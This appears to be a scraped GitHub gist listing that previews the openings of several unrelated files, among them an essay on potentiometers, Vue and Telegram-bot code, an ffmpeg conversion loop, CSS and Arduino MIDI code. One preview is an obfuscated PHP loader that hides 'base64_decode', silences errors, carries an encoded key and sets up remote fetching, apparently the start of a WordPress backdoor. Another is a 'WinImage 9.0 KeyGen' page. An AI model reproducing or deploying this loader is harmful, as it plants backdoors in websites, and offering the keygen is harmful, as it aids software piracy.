This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
The Secret Life of Pots | |
Copyright 1999 R.G. Keen All rights reserved. | |
As electronics tinkerers, we all use potentiometers, or "pots" for short. We count on them to control all our musical gear, and quite often get frustrated by their limitations. As in all relationships, a little understanding goes a long way. Let's take a look at how pots work so we can use them better. | |
Back in the dim reaches of electronic prehistory when electricity, let alone electronics, was poorly understood , a number of researchers were trying to figure out how this mysterious force worked. They had no meters, no oscilloscopes, not even very good batteries, and had to literally make their own parts to get anything electrical to work. In this era, a fellow named Ohm settled a controversy. There was general agreement in the electrical research realm that the ratio of a voltage to the resulting current in any chunk of material was dependent on the material itself and the value of the current raised to some power, or | |
V=k * I^x | |
The rag |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php @ini_set('display_errors', '0'); | |
error_reporting(0); | |
global $zeeta; | |
if (!$npDcheckClassBgp && !isset($zeeta)) { | |
$ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'default'; $pass = "Zgc5c4MXrK42MQ4F8YpQL/+fflvUNPlfnyDNGK/X/wEfeQ=="; | |
if (!function_exists('get_data_ya')) { | |
if (ini_get('allow_url_fopen')) { | |
function get_data_ya($m) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* Author: Gkiokan Sali | |
* Date 2024-09-22 | |
* Note: | |
* Put this file in your src/components folder | |
* and import it in your main.ts / entrypoint | |
* call autoRegisterComponents(app) to do so | |
* -- | |
* Hint: | |
* If you wanna perfect this, put the vue cycle hook methods inside |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import clc from 'cli-color' | |
import log from '../log' | |
import store from '../store' | |
import helper from '../util/helper' | |
import { bot } from './BotController'; | |
let CommandController = { | |
// This should hold all commands to their specific language |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import store from '../store' | |
import log from '../log' | |
import { Bot, Context, session, lazySession } from "grammy" | |
import { sequentialize } from '@grammyjs/runner' | |
import MessageComposer from './MessageComposer' | |
import MenuComposer from './MenuComposer' | |
let BotController = { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Transform all *.aac files to mp3 with ffmpeg | |
for file in *.aac; do ffmpeg -i "$file" -codec:v copy -codec:a libmp3lame -q:a 4 "${file%.aac}.mp3"; done |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
html, body.body--dark { | |
/* Foreground, Background */ | |
scrollbar-color: #999 #333; | |
::-webkit-scrollbar { | |
width: 10px; /* Mostly for vertical scrollbars */ | |
height: 5px; /* Mostly for horizontal scrollbars */ | |
} | |
::-webkit-scrollbar-thumb { /* Foreground */ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <MIDI.h> | |
const int channel = 0; | |
const int wheelPin = A2; | |
int wheel = 0; | |
int mappedWheel = 0; | |
int maxPitchValue = 16383; | |
// Probably fix for Hairless as it seems to run on 115200 but didn't helped me | |
// struct HairlessMidiSettings : public midi::DefaultSettings |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!doctype html> | |
<html> | |
<head> | |
<meta charset="utf-8"> | |
<meta http-equiv="X-UA-Compatible" content="IE=edge"> | |
<title>WinImage 9.0 KeyGen</title> | |
<meta name="viewport" content="width=device-width, initial-scale=1"> | |
</head> | |
<body style="text-align: center;"> | |
<h1>WinImage 9.0 KeyGen</h1> |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
NewerOlder